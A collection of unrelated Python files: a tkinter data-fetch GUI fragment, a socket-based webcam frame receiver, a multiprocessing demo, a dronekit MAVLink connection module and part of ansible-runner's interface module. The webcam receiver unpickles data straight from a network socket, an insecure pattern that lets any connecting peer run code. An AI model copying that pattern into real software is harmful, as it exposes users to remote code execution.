self.typeCheckOK.grid(sticky=tk.N+tk.S+tk.E+tk.W)
def _typeCheckChange(self):
self.w.destroy()
dts = []
for i in self.data_types:
if self.data_types[i].get() == 1:
dts.append(i)
self.nl._set_dtypes(dts)
print("Datatypes: %s" %(self.nl._dtypes))
def setFetchDir(self):
nosDir = tkFileDialog.askdirectory(title="Select A Folder", mustexist=0)
if nosDir: noslib._set_out_dir(nosDir)
print("Fetch Directory: %s" %(noslib._out_dir))
def resetFetchDir(self):
noslib._set_out_dir(expanduser("~"))
print("Fetch Directory: %s" %(noslib._out_dir))
def runUpdate(self):
def callback():
nbOb = noslib.nosBounds()
self.downloading.set("updating")
for i in noslib._nos_directories:
sl = nbOb._readDir(i)
for j in sl:
nbOb._updateLines(j)
nbOb._write()
self.downloading.set("idle")
t = threading.Thread(target=callback)
t.start()
def updateSurveys(self):
print("updating")
self.runUpdate()
if __name__ == '__main__':
root = tk.Tk()
app = Application(root)
app.master.title('NOS-Fetch')
#imgicon = tk.PhotoImage(file=os.path.join('./','favicon.ico'))
#app.master.tk.call('wm', 'iconphoto', app.master._w, imgicon)
#app.master.iconbitmap(os.path.join('./', 'favicon.ico'))
root.mainloop()
|
webcam-host.py
|
import cv2
import socket
import struct
import pickle
from pynput.keyboard import Key, Listener, Controller
import threading
import sys
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
streaming = True
break_streaming = False
HOST = socket.gethostname()
PORT = 8081
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
data = b""
payload_size = struct.calcsize("L")
keyboard = Controller()
def get_keyboard_input():
global streaming
def on_press(key):
global streaming
if key == Key.esc:
print(streaming)
streaming = False
break_streaming = True
return False
with Listener(on_press=on_press) as listener:
listener.join()
keypresses = threading.Thread(target=get_keyboard_input)
keypresses.start()
while streaming:
while len(data) < payload_size and not break_streaming:
data += conn.recv(4096)
packed_msg_size = data[:payload_size]
data = data[payload_size:]
msg_size = struct.unpack("L", packed_msg_size)[0]
while len(data) < msg_size:
data += conn.recv(4096)
frame_data = data[:msg_size]
data = data[msg_size:]
frame = pickle.loads(frame_data)
cv2.imshow("frame", frame)
cv2.waitKey(1)
conn.close()
print("ENDING STREAM")
cv2.destroyAllWindows()
|
multi.py
|
import time
import multiprocessing
def sum_1_to(n, i):
'''
一个耗时的累加计算。
'''
print('start: {}'.format(i))
start = time.time()
r = 0
for i in range(n):
r += i
end = time.time()
print('end {}: {}s'.format(i, end - start))
return r
def new_process(target, args):
'''
启动一个守护线程。
'''
process = multiprocessing.Process(target=target, args=args)
process.start()
return process
def main():
'''
由于 GIL 锁,导致 Python 解释器只能同时执行单线程的代码。
每 100 个 Python 解释器命名切换一个线程执行。
所以使用多进程。
'''
# spawn 只会执行和 target 参数或者 run() 方法相关的代码。Windows 只能是这种模式。
# fork
# forserver,仅 unix 可用。
multiprocessing.set_start_method('spawn')
for i in range(4):
new_process(target=sum_1_to, args=(100000000, i))
# 主进程任意输入退出。
input('place input to exit:\n')
if __name__ == '__main__':
main()
|
mavlink.py
|
from __future__ import print_function
import logging
import time
import socket
import errno
import sys
import os
import platform
import copy
from dronekit import APIException
from pymavlink import mavutil
from queue import Queue, Empty
from threading import Thread
if platform.system() == 'Windows':
from errno import WSAECONNRESET as ECONNABORTED
else:
from errno import ECONNABORTED
class MAVWriter(object):
"""
Indirection layer to take messages written to MAVlink and send them all
on the same thread.
"""
def __init__(self, queue):
self._logger = logging.getLogger(__name__)
self.queue = queue
def write(self, pkt):
self.queue.put(pkt)
def read(self):
self._logger.critical('writer should not have had a read request')
os._exit(43)
class mavudpin_multi(mavutil.mavfile):
'''a UDP mavlink socket'''
def __init__(self, device, baud=None, input=True, broadcast=False, source_system=255, source_component=0, use_native=mavutil.default_native):
self._logger = logging.getLogger(__name__)
a = device.split(':')
if len(a) != 2:
self._logger.critical("UDP ports must be specified as host:port")
sys.exit(1)
self.port = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.udp_server = input
self.broadcast = False
self.addresses = set()
if input:
self.port.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.port.bind((a[0], int(a[1])))
else:
self.destination_addr = (a[0], int(a[1]))
if broadcast:
self.port.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
self.broadcast = True
mavutil.set_close_on_exec(self.port.fileno())
self.port.setblocking(False)
mavutil.mavfile.__init__(self, self.port.fileno(), device, source_system=source_system, source_component=source_component, input=input, use_native=use_native)
def close(self):
self.port.close()
def recv(self, n=None):
try:
try:
data, new_addr = self.port.recvfrom(65535)
except socket.error as e:
if e.errno in [errno.EAGAIN, errno.EWOULDBLOCK, errno.ECONNREFUSED]:
return ""
if self.udp_server:
self.addresses.add(new_addr)
elif self.broadcast:
self.addresses = {new_addr}
return data
except Exception:
self._logger.exception("Exception while reading data", exc_info=True)
def write(self, buf):
try:
try:
if self.udp_server:
for addr in self.addresses:
self.port.sendto(buf, addr)
else:
if len(self.addresses) and self.broadcast:
self.destination_addr = self.addresses[0]
self.broadcast = False
self.port.connect(self.destination_addr)
self.port.sendto(buf, self.destination_addr)
except socket.error:
pass
except Exception:
self._logger.exception("Exception while writing data", exc_info=True)
def recv_msg(self):
'''message receive routine for UDP link'''
self.pre_message()
s = self.recv()
if len(s) > 0:
if self.first_byte:
self.auto_mavlink_version(s)
m = self.mav.parse_char(s)
if m is not None:
self.post_message(m)
return m
class MAVConnection(object):
def stop_threads(self):
if self.mavlink_thread_in is not None:
self.mavlink_thread_in.join()
self.mavlink_thread_in = None
if self.mavlink_thread_out is not None:
self.mavlink_thread_out.join()
self.mavlink_thread_out = None
def __init__(self, ip, baud=115200, target_system=0, source_system=255, source_component=0, use_native=False):
self._logger = logging.getLogger(__name__)
if ip.startswith("udpin:"):
self.master = mavudpin_multi(ip[6:], input=True, baud=baud, source_system=source_system, source_component=source_component)
else:
self.master = mavutil.mavlink_connection(ip, baud=baud, source_system=source_system, source_component=source_component)
# TODO get rid of "master" object as exposed,
# keep it private, expose something smaller for dronekit
self.out_queue = Queue()
self.master.mav = mavutil.mavlink.MAVLink(
MAVWriter(self.out_queue),
srcSystem=self.master.source_system,
srcComponent=self.master.source_component,
use_native=use_native)
# Monkey-patch MAVLink object for fix_targets.
sendfn = self.master.mav.send
def newsendfn(mavmsg, *args, **kwargs):
self.fix_targets(mavmsg)
return sendfn(mavmsg, *args, **kwargs)
self.master.mav.send = newsendfn
# Targets
self.target_system = target_system
# Listeners.
self.loop_listeners = []
self.message_listeners = []
# Debug flag.
self._accept_input = True
self._alive = True
self._death_error = None
import atexit
def onexit():
self._alive = False
self.stop_threads()
atexit.register(onexit)
def mavlink_thread_out():
# Huge try catch in case we see http://bugs.python.org/issue1856
try:
while self._alive:
try:
msg = self.out_queue.get(True, timeout=0.01)
self.master.write(msg)
except Empty:
continue
except socket.error as error:
# If connection reset (closed), stop polling.
if error.errno == ECONNABORTED:
raise APIException('Connection aborting during read')
raise
except Exception as e:
self._logger.exception('mav send error: %s' % str(e))
break
except APIException as e:
self._logger.exception("Exception in MAVLink write loop", exc_info=True)
self._alive = False
self.master.close()
self._death_error = e
except Exception as e:
# http://bugs.python.org/issue1856
if not self._alive:
pass
else:
self._alive = False
self.master.close()
self._death_error = e
# Explicitly clear out buffer so .close closes.
self.out_queue = Queue()
def mavlink_thread_in():
# Huge try catch in case we see http://bugs.python.org/issue1856
try:
while self._alive:
# Loop listeners.
for fn in self.loop_listeners:
fn(self)
# Sleep
self.master.select(0.05)
while self._accept_input:
try:
msg = self.master.recv_msg()
except socket.error as error:
# If connection reset (closed), stop polling.
if error.errno == ECONNABORTED:
raise APIException('Connection aborting during send')
raise
except mavutil.mavlink.MAVError as e:
# Avoid
# invalid MAVLink prefix '73'
# invalid MAVLink prefix '13'
self._logger.debug('mav recv error: %s' % str(e))
msg = None
except Exception:
# Log any other unexpected exception
self._logger.exception('Exception while receiving message: ', exc_info=True)
msg = None
if not msg:
break
# Message listeners.
for fn in self.message_listeners:
try:
fn(self, msg)
except Exception:
self._logger.exception(
'Exception in message handler for %s' % msg.get_type(),
exc_info=True
)
except APIException as e:
self._logger.exception('Exception in MAVLink input loop')
self._alive = False
self.master.close()
self._death_error = e
return
except Exception as e:
# http://bugs.python.org/issue1856
if not self._alive:
pass
else:
self._alive = False
self.master.close()
self._death_error = e
t = Thread(target=mavlink_thread_in)
t.daemon = True
self.mavlink_thread_in = t
t = Thread(target=mavlink_thread_out)
t.daemon = True
self.mavlink_thread_out = t
def reset(self):
self.out_queue = Queue()
if hasattr(self.master, 'reset'):
self.master.reset()
else:
try:
self.master.close()
except:
pass
self.master = mavutil.mavlink_connection(self.master.address)
def fix_targets(self, message):
"""Set correct target IDs for our vehicle"""
if hasattr(message, 'target_system') and message.target_system < 0:
message.target_system = self.target_system
def forward_loop(self, fn):
"""
Decorator for event loop.
"""
self.loop_listeners.append(fn)
def forward_message(self, fn):
"""
Decorator for message inputs.
"""
self.message_listeners.append(fn)
def start(self):
if not self.mavlink_thread_in.is_alive():
self.mavlink_thread_in.start()
if not self.mavlink_thread_out.is_alive():
self.mavlink_thread_out.start()
def close(self):
# TODO this can block forever if parameters continue to be added
self._alive = False
while not self.out_queue.empty():
time.sleep(0.1)
self.stop_threads()
self.master.close()
def pipe(self, target):
target.target_system = self.target_system
# vehicle -> self -> target
@self.forward_message
def callback(_, msg):
try:
target.out_queue.put(msg.pack(target.master.mav))
except:
try:
assert len(msg.get_msgbuf()) > 0
target.out_queue.put(msg.get_msgbuf())
except:
self._logger.exception('Could not pack this object on receive: %s' % type(msg), exc_info=True)
# target -> self -> vehicle
@target.forward_message
def callback(_, msg):
msg = copy.copy(msg)
target.fix_targets(msg)
try:
self.out_queue.put(msg.pack(self.master.mav))
except:
try:
assert len(msg.get_msgbuf()) > 0
self.out_queue.put(msg.get_msgbuf())
except:
self._logger.exception('Could not pack this object on forward: %s' % type(msg), exc_info=True)
return target
|
interface.py
|
# Copyright (c) 2016 Ansible by Red Hat, Inc.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import os
import json
import sys
import threading
import logging
from ansible_runner import output
from ansible_runner.config.runner import RunnerConfig
from ansible_runner.config.command import CommandConfig
from ansible_runner.config.inventory import InventoryConfig
from ansible_runner.config.ansible_cfg import AnsibleCfgConfig
from ansible_runner.config.doc import DocConfig
from ansible_runner.runner import Runner
from ansible_runner.streaming import Transmitter, Worker, Processor
from ansible_runner.utils import (
dump_artifacts,
check_isolation_executable_installed,
santize_json_response
)
logging.getLogger('ansible-runner').addHandler(logging.NullHandler())
def init_runner(**kwargs):
'''
Initialize the Runner() instance
This function will properly initialize both run() and run_async()
functions in the same way and return a value instance of Runner.
See parameters given to :py:func:`ansible_runner.interface.run`
'''
# If running via the transmit-worker-process method, we must only extract things as read-only
# inside of one of these commands. That could be either transmit or worker.
if not kwargs.get('cli_execenv_cmd') and (kwargs.get('streamer') not in ('worker', 'process')):
dump_artifacts(kwargs)
if kwargs.get('streamer'):
# undo any full paths that were dumped by dump_artifacts above in the streamer case
private_data_dir = kwargs['private_data_dir']
project_dir = os.path.join(private_data_dir, 'project')
playbook_path = kwargs.get('playbook') or ''
if os.path.isabs(playbook_path) and playbook_path.startswith(project_dir):
kwargs['playbook'] = os.path.relpath(playbook_path, project_dir)
inventory_path = kwargs.get('inventory') or ''
if os.path.isabs(inventory_path) and inventory_path.startswith(private_data_dir):
kwargs['inventory'] = os.path.relpath(inventory_path, private_data_dir)
roles_path = kwargs.get('envvars', {}).get('ANSIBLE_ROLES_PATH') or ''
if os.path.isabs(roles_path) and roles_path.startswith(private_data_dir):
kwargs['envvars']['ANSIBLE_ROLES_PATH'] = os.path.relpath(roles_path, private_data_dir)
debug = kwargs.pop('debug', None)
logfile = kwargs.pop('logfile', None)
if not kwargs.pop("ignore_logging", True):
output.configure()
if debug in (True, False):
output.set_debug('enable' if debug is True else 'disable')
if logfile:
output.set_logfile(logfile)
if kwargs.get("process_isolation", False):
pi_executable = kwargs.get("process_isolation_executable", "podman")
if not check_isolation_executable_installed(pi_executable):
print(f'Unable to find process isolation executable: {pi_executable}')
sys.exit(1)
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
streamer = kwargs.pop('streamer', None)
if streamer:
if streamer == 'transmit':
stream_transmitter = Transmitter(**kwargs)
return stream_transmitter
if streamer == 'worker':
stream_worker = Worker(**kwargs)
return stream_worker
if streamer == 'process':
stream_processor = Processor(event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback,
**kwargs)
return stream_processor
kwargs.pop('_input', None)
kwargs.pop('_output', None)
rc = RunnerConfig(**kwargs)
rc.prepare()
return Runner(rc,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
def run(**kwargs):
'''
Run an Ansible Runner task in the foreground and return a Runner object when complete.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param playbook: The playbook (either supplied here as a list or string... or as a path relative to
``private_data_dir/project``) that will be invoked by runner when executing Ansible.
:param module: The module that will be invoked in ad-hoc mode by runner when executing Ansible.
:param module_args: The module arguments that will be supplied to ad-hoc mode.
:param host_pattern: The host pattern to match when running in ad-hoc mode.
:param inventory: Overrides the inventory directory/file (supplied at ``private_data_dir/inventory``) with
a specific host or list of hosts. This can take the form of
- Path to the inventory file in the ``private_data_dir``
- Native python dict supporting the YAML/json inventory structure
- A text INI formatted string
- A list of inventory sources, or an empty list to disable passing inventory
:param roles_path: Directory or list of directories to assign to ANSIBLE_ROLES_PATH
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param extravars: Extra variables to be passed to Ansible at runtime using ``-e``. Extra vars will also be
read from ``env/extravars`` in ``private_data_dir``.
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param cmdline: Command line options passed to Ansible read from ``env/cmdline`` in ``private_data_dir``
:param limit: Matches ansible's ``--limit`` parameter to further constrain the inventory to be used
:param forks: Control Ansible parallel concurrency
:param verbosity: Control how verbose the output of ansible-playbook is
:param quiet: Disable all output
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param streamer: Optionally invoke ansible-runner as one of the steps in the streaming pipeline
:param _input: An optional file or file-like object for use as input in a streaming pipeline
:param _output: An optional file or file-like object for use as output in a streaming pipeline
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:param process_isolation: Enable process isolation, using either a container engine (e.g. podman) or a sandbox (e.g. bwrap).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param process_isolation_path: Path that an isolated playbook run will use for staging. (default: /tmp)
:param process_isolation_hide_paths: A path or list of paths on the system that should be hidden from the playbook run.
:param process_isolation_show_paths: A path or list of paths on the system that should be exposed to the playbook run.
:param process_isolation_ro_paths: A path or list of paths on the system that should be exposed to the playbook run as read-only.
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir. (default: None)
:param container_options: List of container options to pass to execution engine.
:param resource_profiling: Enable collection of resource utilization data during playbook execution.
:param resource_profiling_base_cgroup: Name of existing cgroup which will be sub-grouped in order to measure resource utilization (default: ansible-runner)
:param resource_profiling_cpu_poll_interval: Interval (in seconds) between CPU polling for determining CPU usage (default: 0.25)
:param resource_profiling_memory_poll_interval: Interval (in seconds) between memory polling for determining memory usage (default: 0.25)
:param resource_profiling_pid_poll_interval: Interval (in seconds) between polling PID count for determining number of processes used (default: 0.25)
:param resource_profiling_results_dir: Directory where profiling data files should be saved (defaults to profiling_data folder inside private data dir)
:param directory_isolation_base_path: An optional path will be used as the base path to create a temp directory, the project contents will be
copied to this location which will then be used as the working directory during playbook execution.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param omit_event_data: Omits extra ansible event data from event payload (stdout and event still included)
:param only_failed_event_data: Omits extra ansible event data unless it's a failed event (stdout and event still included)
:param cli_execenv_cmd: Tells Ansible Runner to emulate the CLI of Ansible by prepping an Execution Environment and then passing the user provided cmdline
:type private_data_dir: str
:type ident: str
:type json_mode: bool
:type playbook: str or filename or list
:type inventory: str or dict or list
:type envvars: dict
:type extravars: dict
:type passwords: dict
:type settings: dict
:type ssh_key: str
:type artifact_dir: str
:type project_dir: str
:type rotate_artifacts: int
:type cmdline: str
:type limit: str
:type forks: int
:type quiet: bool
:type verbosity: int
:type streamer: str
:type _input: file
:type _output: file
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:type process_isolation: bool
:type process_isolation_executable: str
:type process_isolation_path: str
:type process_isolation_hide_paths: str or list
:type process_isolation_show_paths: str or list
:type process_isolation_ro_paths: str or list
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type resource_profiling: bool
:type resource_profiling_base_cgroup: str
:type resource_profiling_cpu_poll_interval: float
:type resource_profiling_memory_poll_interval: float
:type resource_profiling_pid_poll_interval: float
:type resource_profiling_results_dir: str
:type directory_isolation_base_path: str
:type fact_cache: str
:type fact_cache_type: str
:type omit_event_data: bool
:type only_failed_event_data: bool
:type cli_execenv_cmd: str
:returns: A :py:class:`ansible_runner.runner.Runner` object, or a simple object containing `rc` if run remotely
'''
r = init_runner(**kwargs)
r.run()
return r
def run_async(**kwargs):
'''
Runs an Ansible Runner task in the background which will start immediately. Returns the thread object and a Runner object.
This uses the same parameters as :py:func:`ansible_runner.interface.run`
:returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
'''
r = init_runner(**kwargs)
runner_thread = threading.Thread(target=r.run)
runner_thread.start()
return runner_thread, r
def init_command_config(executable_cmd, cmdline_args=None, **kwargs):
'''
Initialize the Runner() instance
This function will properly initialize both run_command() and run_command_async()
functions in the same way and return a value instance of Runner.
See parameters given to :py:func:`ansible_runner.interface.run_command`
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rc = CommandConfig(**kwargs)
rc.prepare_run_command(executable_cmd, cmdline_args=cmdline_args)
return Runner(rc,
event_handler=event_callback_handler,
status_handler=status_callback_handler,
artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback,
finished_callback=finished_callback)
def run_command(executable_cmd, cmdline_args=None, **kwargs):
'''
Run an (Ansible) commands in the foreground and return a Runner object when complete.
:param executable_cmd: The command to be executed.
:param cmdline_args: A list of arguments to be passed to the executable command.
:param input_fd: This parameter is applicable when ``runner_mode`` is set to ``subprocess``, it provides the
input file descrption to interact with the sub-process running the command.
:param output_fd: The output file descriptor to stream the output of command execution.
:param error_fd: This parameter is applicable when ``runner_mode`` is set to ``subprocess``, it provides the
error file descrption to read the error received while executing the command.
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. If the value of ``input_fd`` parameter
is set or the executable command is one of ``ansible-config``, ``ansible-doc`` or ``ansible-galaxy``
the default value is set to ``subprocess`` else in other cases it is set to ``pexpect``.
:param cwd: The current working directory from which the command in executable_cmd shoul be be executed.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:type executable_cmd: str
:type cmdline_args: list
:type input_fd: file descriptor
:type output_fd: file descriptor
:type error_fd: file descriptor
:type runner_mode: str
:type cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type ssh_key: str
:type quiet: bool
:type json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:returns: Retunes a tuple of response and error string. In case if ``runner_mode`` is set to ``pexpect`` the error value is empty as
``pexpect`` uses same output descriptor for stdout and stderr.
'''
r = init_command_config(executable_cmd, cmdline_args=cmdline_args, **kwargs)
r.run()
response = r.stdout.read()
error = r.stderr.read()
return response, error
def run_command_async(executable_cmd, cmdline_args=None, **kwargs):
'''
Run an (Ansible) commands in the background which will start immediately. Returns the thread object and a Runner object.
This uses the same parameters as :py:func:`ansible_runner.interface.run_command`
:returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
'''
r = init_command_config(executable_cmd, cmdline_args=cmdline_args, **kwargs)
runner_thread = threading.Thread(target=r.run)
runner_thread.start()
return runner_thread, r
def init_plugin_docs_config(plugin_names, plugin_type=None, response_format=None,
snippet=False, playbook_dir=None, module_path=None, **kwargs):
'''
Initialize the Runner() instance
This function will properly initialize both get_plugin_docs() and get_plugin_docs_async()
functions in the same way and return a value instance of Runner.
See parameters given to :py:func:`ansible_runner.interface.get_plugin_docs`
'''
event_callback_handler = kwargs.pop('event_handler', None)
status_callback_handler = kwargs.pop('status_handler', None)
artifacts_handler = kwargs.pop('artifacts_handler', None)
cancel_callback = kwargs.pop('cancel_callback', None)
finished_callback = kwargs.pop('finished_callback', None)
rd = DocConfig(**kwargs)
rd.prepare_plugin_docs_command(plugin_names, plugin_type=plugin_type, response_format=response_format,
snippet=snippet, playbook_dir=playbook_dir, module_path=module_path)
return Runner(rd, event_handler=event_callback_handler, status_handler=status_callback_handler, artifacts_handler=artifacts_handler,
cancel_callback=cancel_callback, finished_callback=finished_callback)
def get_plugin_docs(plugin_names, plugin_type=None, response_format=None, snippet=False, playbook_dir=None, module_path=None, **kwargs):
'''
Run an ansible-doc command to get plugin docs in the foreground and return a Runner object when complete.
:param plugin_names: The name of the plugins to get docs.
:param plugin_type: The type of the plugin mentioned in plugins_names. Valid values are ``become``, ``cache``, ``callback``,
``cliconf``, ``connection``, ``httpapi``, ``inventory``, ``lookup``, ``netconf``, ``shell``, ``vars``,
``module``, ``strategy``. If the value is not provided it defaults to ``module``.
:param response_format: The output format for response. Valid values can be one of ``json`` or ``human`` and the response
is either json string or plain text in human readable foramt. Default value is ``json``.
:param snippet: Show playbook snippet for specified plugin(s).
:param playbook_dir: This parameter is used to sets the relative path to handle playbook adjacent installed plugins.
:param module_path: This parameter is prepend colon-separated path(s) to module library
(default=~/.ansible/plugins/modules:/usr/share/ansible/plugins/modules).
:param runner_mode: The applicable values are ``pexpect`` and ``subprocess``. Default is set to ``subprocess``.
:param cwd: The current working directory from which the command in executable_cmd should be be executed.
:param envvars: Environment variables to be used when running Ansible. Environment variables will also be
read from ``env/envvars`` in ``private_data_dir``
:param passwords: A dictionary containing password prompt patterns and response values used when processing output from
Ansible. Passwords will also be read from ``env/passwords`` in ``private_data_dir``.
:param settings: A dictionary containing settings values for the ``ansible-runner`` runtime environment. These will also
be read from ``env/settings`` in ``private_data_dir``.
:param ssh_key: The ssh private key passed to ``ssh-agent`` as part of the ansible-playbook run.
:param quiet: Disable all output
:param json_mode: Store event data in place of stdout on the console and in the stdout file
:param artifact_dir: The path to the directory where artifacts should live, this defaults to 'artifacts' under the private data dir
:param project_dir: The path to the playbook content, this defaults to 'project' within the private data dir
:param rotate_artifacts: Keep at most n artifact directories, disable with a value of 0 which is the default
:param process_isolation: Enable process isolation, using a container engine (e.g. podman).
:param process_isolation_executable: Process isolation executable or container engine used to isolate execution. (default: podman)
:param container_image: Container image to use when running an ansible task (default: quay.io/ansible/ansible-runner:devel)
:param container_volume_mounts: List of bind mounts in the form 'host_dir:/container_dir:labels. (default: None)
:param container_options: List of container options to pass to execution engine.
:param container_workdir: The working directory within the container.
:param fact_cache: A string that will be used as the name for the subdirectory of the fact cache in artifacts directory.
This is only used for 'jsonfile' type fact caches.
:param fact_cache_type: A string of the type of fact cache to use. Defaults to 'jsonfile'.
:param private_data_dir: The directory containing all runner metadata needed to invoke the runner
module. Output artifacts will also be stored here for later consumption.
:param ident: The run identifier for this invocation of Runner. Will be used to create and name
the artifact directory holding the results of the invocation.
:param event_handler: An optional callback that will be invoked any time an event is received by Runner itself, return True to keep the event
:param cancel_callback: An optional callback that can inform runner to cancel (returning True) or not (returning False)
:param finished_callback: An optional callback that will be invoked at shutdown after process cleanup.
:param status_handler: An optional callback that will be invoked any time the status changes (e.g...started, running, failed, successful, timeout)
:param artifacts_handler: An optional callback that will be invoked at the end of the run to deal with the artifacts from the run.
:type plugin_names: list
:type plugin_type: str
:type response_format: str
:type snippet: bool
:type playbook_dir: str
:type module_path: str
:type runner_mode: str
:type cwd: str
:type envvars: dict
:type passwords: dict
:type settings: dict
:type private_data_dir: str
:type project_dir: str
:type artifact_dir: str
:type fact_cache_type: str
:type fact_cache: str
:type process_isolation: bool
:type process_isolation_executable: str
:type container_image: str
:type container_volume_mounts: list
:type container_options: list
:type container_workdir: str
:type ident: str
:type rotate_artifacts: int
:type ssh_key: str
:type quiet: bool
:type json_mode: bool
:type event_handler: function
:type cancel_callback: function
:type finished_callback: function
:type status_handler: function
:type artifacts_handler: function
:returns: Returns a tuple of response and error string. In case if ``runner_mode`` is set to ``pexpect`` the error value is empty as
``pexpect`` uses same output descriptor for stdout and stderr. If the value of ``response_format`` is ``json``
it returns a python dictionary object.
'''
r = init_plugin_docs_config(plugin_names, plugin_type=plugin_type, response_format=response_format,
snippet=snippet, playbook_dir=playbook_dir, module_path=module_path, **kwargs)
r.run()
response = r.stdout.read()
error = r.stderr.read()
if response and response_format == 'json':
response = json.loads(santize_json_response(response))
return response, error
def get_plugin_docs_async(plugin_names, plugin_type=None, response_format=None, snippet=False, playbook_dir=None, module_path=None, **kwargs):
'''
Run an ansible-doc command in the background which will start immediately. Returns the thread object and a Runner object.
This uses the same parameters as :py:func:`ansible_runner.interface.get_plugin_docs`
:returns: A tuple containing a :py:class:`threading.Thread` object and a :py:class:`ansible_runner.runner.Runner` object
'''
r = init_plugin_docs_config(plugin_names, plugin_type=plugin_type, response_format=response_format,
